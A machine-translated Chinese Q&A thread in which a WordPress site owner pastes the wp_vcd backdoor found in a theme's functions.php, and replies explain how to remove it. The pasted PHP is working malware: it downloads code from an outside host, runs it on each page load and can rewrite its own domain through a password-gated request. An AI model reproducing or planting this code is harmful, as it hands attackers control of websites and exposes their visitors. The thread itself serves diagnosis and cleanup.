Php WordPress网站已将我的链接重定向到onclickads网站
我不知道这是不是唯一的密码 每次我在我的网站上点击一些链接时,它都会在onclickads.com链接上重定向我 每次我在theme functions.php上删除这段代码时,它都会一次又一次地生成这段代码。。当我检查主题函数的原始文件时,这段代码不包括在内Php WordPress网站已将我的链接重定向到onclickads网站,php,wordpress,malware,Php,Wordpress,Malware,我不知道这是不是唯一的密码 每次我在我的网站上点击一些链接时,它都会在onclickads.com链接上重定向我 每次我在theme functions.php上删除这段代码时,它都会一次又一次地生成这段代码。。当我检查主题函数的原始文件时,这段代码不包括在内 <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
if ( ! function_exists( 'w1p_te1mp_se1tup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
{
function w1p_te1mp_se1tup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(w1p_te1mp_se1tup($tmpcontent));
}
}
}
?>
此onclickads.com重定向通常是由计算机上安装的广告软件引起的。这些广告软件程序与您从互联网下载的其他免费软件捆绑在一起
可能您不需要安装新版本,您可以通过以下步骤从站点中删除此类注意事项
要删除onclickads.com重定向,请执行以下步骤:
1) 已从文件中删除不需要的代码
2) 从Windows卸载恶意程序
3) 在你的系统上使用安全软件,也可以在你的WordPress中使用安全插件
在遵循这些步骤之后,仍然没有任何效果,然后您可以安装一个新版本,并使用新版本安装安全插件,以避免在将来使用时受到黑客攻击
希望这对你有帮助。谢谢。要完全删除代码,如果您使用的是子主题,您必须同时将其从父主题中删除。我为解决问题所做的:
在wp include
目录中,删除wp vcd.php
和class.wp.php
文件
在wp include
目录中,打开post.php
并首先删除php
恶意软件添加的标签
打开主题的functions.php
文件,删除上面的代码
这是一个完整详细的解决方案,如何修复我在为受攻击的网站寻找解决方案后发现的恶意软件攻击
如果每次都会再次生成,我建议你重新安装wordpress,让黑客们从你的安装中解脱出来。谢谢你的建议也许我会这样做,我别无选择:(非常感谢,我刚刚卸载了我的Cyberghost VPN,现在Onclickads.com不见了,但是上面的代码仍然显示了我所有的插件都被停用了。谢谢Wordfence帮助我解决了这个问题。我的wp上有一个未知的文件,包括wp_vcd.php和class-wp.php,这就是罪魁祸首关闭了post.php上的所有和一些函数。)。。现在我的网站运行正常:DGreat Work@GravityCode:-)这不是一个有用的答案,在评论中更合适。